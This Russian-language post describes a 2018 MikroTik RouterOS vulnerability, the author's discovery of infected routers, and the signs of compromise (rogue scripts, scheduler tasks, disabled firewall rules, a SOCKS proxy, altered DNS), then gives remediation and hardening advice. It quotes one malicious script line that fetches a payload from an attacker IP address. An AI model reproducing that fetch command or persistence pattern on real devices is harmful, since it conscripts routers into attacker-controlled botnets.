Уязвимости MikroTik⁠⁠

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.

Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533